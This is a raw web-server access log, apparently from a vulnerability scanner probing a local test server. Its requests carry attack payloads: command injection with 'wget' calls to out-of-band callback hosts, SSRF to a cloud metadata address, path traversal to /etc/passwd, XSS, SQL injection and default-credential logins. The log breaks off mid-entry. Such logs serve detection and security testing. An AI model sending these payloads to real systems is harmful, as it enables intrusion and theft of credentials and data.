+{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /system/deviceInfo?auth=YWRtaW46MTEK HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://ca285tosmpvbafqg07h0iw895o953conw.oast.fun; HTTP/1.1","status":"400","body_bytes_sents":"0","req_time":"5.134","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sitecore/shell/sitecore.version.xml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"100.100.100.200","request":"GET http://100.100.100.200/dynamic/instance-identity/document HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"browserTime=081119502020¤tTime=1597159205&expires=Wed%252C%2B12%2BAug%2B2020%2B15%253A20%253A05%2BGMT&Command=Submit&user=admin&password=admin","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/login.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /static/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Providers/HtmlEditorProviders/Telerik/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-devtools HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/29KAY3x6E2yDpdFXSXd5aZNr9dB.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"username=%27%22%3E%3Cscript%3Ejavascript%3Aalert%28document.domain%29%3C%2Fscript%3E&password=pd&submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /timesheet/login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/upload/web-ftp.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET ///https://example.com@/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:28 +0000","request_body":"{\x0D\x0A \x22type\x22:\x22bulk\x22,\x0D\x0A \x22args\x22:[\x0D\x0A {\x0D\x0A \x22type\x22:\x22add_remote_schema\x22,\x0D\x0A \x22args\x22:{\x0D\x0A \x22name\x22:\x22test\x22,\x0D\x0A \x22definition\x22:{\x0D\x0A \x22url\x22:\x22https://ca285tosmpvbafqg07h0yyauaogmu3q4e.oast.fun\x22,\x0D\x0A \x22headers\x22:[\x0D\x0A ],\x0D\x0A \x22timeout_seconds\x22:60,\x0D\x0A \x22forward_client_headers\x22:true\x0D\x0A }\x0D\x0A }\x0D\x0A }\x0D\x0A ]\x0D\x0A}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /v1/query HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /etc HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantis/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /config/database.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"module=relogin&action=login&pass=nope&user=a' UNION SELECT 'admin','admin',null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null; #","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/spider.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"Command=Diagnostic&traceMode=ping&reportIpOnly=&pingIpAddr=;wget http://ca285tosmpvbafqg07h04zbqqqyxte9yh.oast.fun&pingPktSize=56&pingTimeout=30&pingCount=4&maxTTLCnt=30&queriesCnt=3&reportIpOnlyCheckbox=on&logarea=com.cgi&btnApply=Apply&T=1646950471018","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /cgi-bin/system_log.cgi HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/?n=product&c=product_admin&a=dopara&app_type=shop&id=1%20union%20SELECT%201,2,3,25367*75643,5,6,7%20limit%205,1%20%23 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /admin/pma/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.. HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /App_Master/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-explorer HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /ansible.cfg HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/info.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /rest/api/2/dashboard?maxResults=100 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%3C%3E//example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /\x5Cu001B]8;;https://example.com\x22/onmouseover=\x22alert(1)\x5Cu0007example\x5Cu001B]8;;\x5Cu0007 HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.027","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /var HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /mantisBT/verify.php?id=1&confirm_hash= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"%3Cscript%3Ealert%28document.domain%29%3B+a=%22%3C%2Fscript%3E&x=1","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /autodiscover/autodiscover.json HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sphider/admin/admin.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /httptrace HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /phpMyAdmin/server_import.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /asynchPeople/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_projectfork§ion=../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /faces/javax.faces.resource/web.xml?loc=../WEB-INF HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/admin/PhotoGallery2/Telerik.Web.UI.DialogHandler.aspx?dp=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"{\x22query\x22:\x22query IntrospectionQuery{__schema {queryType { name }}}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /graphql-playground HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.020","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /sap/bc/gui/sap/its/webgui HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /maint/index.php?packages HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"127.0.0.1/maint/index.php?packages", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //%5C/%5C/example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /apps HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.039","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:24:29 